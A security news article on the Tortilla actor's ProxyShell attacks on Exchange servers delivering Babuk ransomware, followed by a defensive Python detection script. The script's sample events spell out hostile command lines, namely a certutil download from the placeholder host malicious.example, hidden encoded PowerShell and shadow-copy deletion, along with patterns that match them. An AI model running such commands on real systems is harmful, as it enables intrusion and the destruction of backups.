The Microsoft Exchange ProxyShell vulnerabilities are being exploited yet again to deliver ransomware, this time Babuk, at the hands of the newly identified “Tortilla” threat actor.
A relatively new threat actor tracked as “Tortilla” is launching a fresh round of ProxyShell attacks on Microsoft Exchange servers, this time aiming to infect vulnerable servers with variants of the Babuk ransomware.
Cisco Talos researchers said in a report published Wednesday that they first spotted the campaign on Oct. 12.
Tortilla, an actor that has been operating since July, is mainly targeting US victims, with a smaller number of infections observed on machines in Brazil, Finland, Germany, Honduras, Thailand, Ukraine & the UK.
PowerCat
Prior to this ransomware campaign, Tortilla had been experimenting with other payloads, such as PowerCat, a PowerShell-based netcat clone.
Netcat is a networking utility for reading from & writing to network connections using TCP or UDP, designed to be a dependable back-end that can be used directly or easily driven by other programs & scripts.
PowerCat targets Windows, the researchers explained, being “known to provide attackers with unauthorised access to Windows machines.”
New Attack Surface
ProxyShell is the name given to an attack that chains 3 Exchange vulnerabilities (CVE-2021-34473, a pre-authentication path-confusion flaw; CVE-2021-34523, an elevation of privilege in the Exchange PowerShell back end; & CVE-2021-31207, a post-authentication arbitrary file write) to give an unauthenticated attacker remote code execution (RCE) on the server.
The chain was outlined in a presentation (PDF) given by Devcore Principal Security Researcher Orange Tsai at Black Hat USA in Las Vegas in Aug. In it, Tsai disclosed an entirely new attack surface in Exchange, including attack chains for unauthenticated RCE & for the capture of plaintext passwords, & a barrage of attacks soon followed. Aug. was full of reports of threat actors exploiting ProxyShell to plant web shells, as well as to deliver LockFile ransomware.
Infection Chain
In this latest ProxyShell campaign, Cisco Talos researchers explained that the threat actor is using “a somewhat unusual infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone pastebin.pl” to deliver Babuk.
They continued: “The intermediate unpacking stage is downloaded & decoded in memory before the final payload embedded within the original sample is decrypted & executed.”
Babuk?
Babuk is probably best known for its role in the April breach of the Washington, D.C. Metropolitan Police Department. The gang behind the malware has a short history, having only surfaced in early 2021, but that history shows it to be a double-extortion operation: one that threatens to publish stolen data in addition to encrypting files, as a way of pressuring victims into paying.
That tactic has worked. As McAfee described in Feb., Babuk had by then been used against at least 5 large enterprises, & in one case the gang walked away with $85k after the victim paid, McAfee researchers revealed.
Its victims have included Serco, an outsourcing firm that confirmed it had been hit by a double-extortion ransomware attack in late Jan.
Like many ransomware families, Babuk is ruthless: it not only encrypts a victim’s machine, it also interrupts backups & deletes the volume shadow copies, Cisco Talos stated.
What Makes Babuk Work
On the technical side, Cisco Talos described Babuk as a flexible ransomware that can be compiled, through a ransomware builder, for several hardware & software platforms.
It is mostly compiled for Windows & for ARM on Linux, but the researchers have also seen versions for VMware ESX & an older 32-bit PE executable.
In this recent Oct. campaign, though, the threat actors are specifically targeting Windows.
China Chopper
Part of the infection chain involves China Chopper: a web shell that dates back to 2010 but has remained relevant since, including reportedly being used in Operation Soft Cell, a massive 2019 campaign against telecommunications providers.
The web-shell enables attackers to “retain access to an infected system using a client-side application which contains all the logic required to control the target,” as Cisco Talos described the web-shell in 2019.
This time it is being used to gain a foothold on Exchange servers. “We assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,” according to the Cisco Talos write-up.
Initial Execution
As shown in the infection flow chart below, the actors use either a DLL or a .NET executable to kick things off on the targeted system. “The initial .NET executable module runs as a child process of w3wp.exe & invokes the command shell to run an obfuscated PowerShell command,” according to Cisco Talos’ report.
“The PowerShell command invokes a web request & downloads the payload loader module using certutil.exe from a URL hosted on the domains fbi[.]fund & xxxs[.]info, or the IP address 185[.]219[.]52[.]229,” researchers commented.
Unpacking Stage
“The payload loader downloads an intermediate unpacking stage from the Pastebin clone site pastebin.pl,” they continued – a site that “seems to be unrelated to the popular pastebin.com.”
They went on: “The unpacker concatenates the bitmap images embedded in the resource section of the trojan & decrypts the payload into the memory. The payload is injected into the process AddInProcess32 & is used to encrypt files on the victim’s server & all mounted drives.”
Tortilla’s Infrastructure
Besides the pastebin.pl site that hosts Tortilla’s intermediate unpacker code, Tortilla’s infrastructure also includes a Unix-based download server.
The pastebin.pl site itself is legitimate, but Cisco Talos has seen multiple malicious campaigns using it, including to host variants of the Agent Tesla trojan & the FormBook malware dropper.
Code Spill Helps Newcomers
In July, the Babuk gang’s source code & builder were leaked & uploaded to VirusTotal, making them available to every security vendor & competitor. That leak has helped the ransomware spread even to a relatively inexperienced group like Tortilla, Cisco Talos explained.
The leak “may have encouraged new malicious actors to manipulate & deploy the malware,” researchers noted.
“This actor has only been operating since early July this year & has been experimenting with different payloads, apparently in order to obtain & maintain remote access to the infected systems,” according to its write-up.
Source Code
With the Babuk source code readily available, all the Tortilla operators need is the skill to modify it slightly, researchers stated: a situation that observers predicted when the code first appeared.
“The actor displays low to medium skills with a decent understanding of the security concepts & the ability to create minor modifications to existing malware & offensive security tools,” Cisco Talos researchers outlined in assessing the Tortilla gang.
Decryptor Does Not Work on This Variant
While a free Babuk decryptor was released last week, it will not work on the Babuk variant seen in this campaign, according to the write-up:
“Unfortunately, it is only effective on files encrypted with a number of leaked keys & cannot be used to decrypt files encrypted by the variant described in this blog post.”
Keep Exchange Safe
Tortilla is hosting malicious modules & conducting internet-wide scanning to exploit vulnerable hosts.
The researchers recommended staying vigilant, catching any infection in its initial stages & implementing layered defences, “with the behavioural protection enabled for endpoints & servers to detect the threats at an early stage of the infection chain.”
They also recommended keeping servers & applications updated so as to close vulnerabilities such as the 3 CVEs exploited in the ProxyShell attacks. Microsoft fixed all 3 in the April & May 2021 Exchange security updates, so an Exchange server still running an older build remains exposed regardless of how recently its operating system was patched.
Deletes Shadow Copies
Also, keep an eye out for backup demolition, as the code deletes shadow copies:
“Babuk ransomware is nefarious by its nature & while it encrypts the victim’s machine, it interrupts the system backup process & deletes the volume shadow copies,” according to Cisco Talos.
In addition, strengthen detection: Watch out for system configuration changes, suspicious events generated by detection systems for an abrupt service termination, or abnormally high I/O rates for drives attached to servers, concluded Cisco Talos.
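The process chain described in the Cisco Talos write-up above (w3wp.exe spawning a command shell, an encoded PowerShell command, certutil.exe fetching the loader) and the shadow-copy deletion just mentioned each leave a distinct trace in process-creation telemetry. The following is an added example, not Cisco Talos code: a set of simple detection rules run over constructed Sysmon-style (Event ID 1) process-creation records. The sample events, paths and the placeholder domain malicious.example are constructed for this example and are not indicators from the campaign.

```python
"""Process-chain detections for the Tortilla/Babuk activity described above.

Added example, not Cisco Talos code. Records mimic Sysmon Event ID 1
(process creation) fields; all sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str  # full path of the parent process
    image: str         # full path of the new process
    command_line: str  # command line of the new process


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s|$)")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event triggers (empty list = clean)."""
    parent, image, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line
    hits = []
    # 1. IIS worker spawning a shell: how a China Chopper command reaches the host.
    if parent == "w3wp.exe" and image in SHELLS:
        hits.append("webshell_child_of_w3wp")
    # 2. Encoded/obfuscated PowerShell, as in the first stage of the chain.
    if image in POWERSHELL and ENCODED_FLAG.search(cmd):
        hits.append("powershell_encoded_command")
    # 3. certutil abused as a downloader (-urlcache ... <url>).
    if image == "certutil.exe" and re.search(r"(?i)-urlcache\b", cmd) and re.search(r"(?i)https?://", cmd):
        hits.append("certutil_download")
    # 4. Shadow copy / backup destruction before encryption starts.
    if (image == "vssadmin.exe" and re.search(r"(?i)delete\s+shadows", cmd)) \
            or (image == "wmic.exe" and re.search(r"(?i)shadowcopy\s+delete", cmd)) \
            or (image == "wbadmin.exe" and re.search(r"(?i)delete\s+(?:catalog|systemstatebackup)", cmd)) \
            or (image in POWERSHELL and re.search(r"(?i)Win32_ShadowCopy.*(?:Remove-WmiObject|\.Delete\(\))", cmd)):
        hits.append("shadow_copy_deletion")
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> rule hits, for every event that triggers at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := detect(ev))}


# Constructed sample telemetry (paths and URL are placeholders, not campaign IOCs).
IIS = r"C:\Windows\System32\inetsrv\w3wp.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CERTUTIL = r"C:\Windows\System32\certutil.exe"
VSSADMIN = r"C:\Windows\System32\vssadmin.exe"
ADDIN = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
B64 = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"  # constructed, truncated payload

SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),  # 0: benign
    ProcEvent(IIS, CMD, f"cmd.exe /c powershell -nop -w hidden -enc {B64}"),       # 1: web shell -> cmd
    ProcEvent(CMD, PS, f"powershell -nop -w hidden -enc {B64}"),                   # 2: encoded PowerShell
    ProcEvent(PS, CERTUTIL, r"certutil.exe -urlcache -split -f http://malicious.example/ldr.exe C:\Windows\Temp\ldr.exe"),  # 3
    ProcEvent(CMD, CERTUTIL, r"certutil.exe -verify C:\certs\server.cer"),         # 4: benign certutil
    ProcEvent(ADDIN, VSSADMIN, "vssadmin.exe delete shadows /all /quiet"),         # 5: backup destruction
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Rule 1 is the one to alert on first: an IIS worker process has no business launching cmd.exe or PowerShell, and it fires before any payload is downloaded. Rule 4 covers the common shadow-copy deletion commands generally rather than only the ones this campaign might use; expect some noise from legitimate backup software and tune with parent-process context.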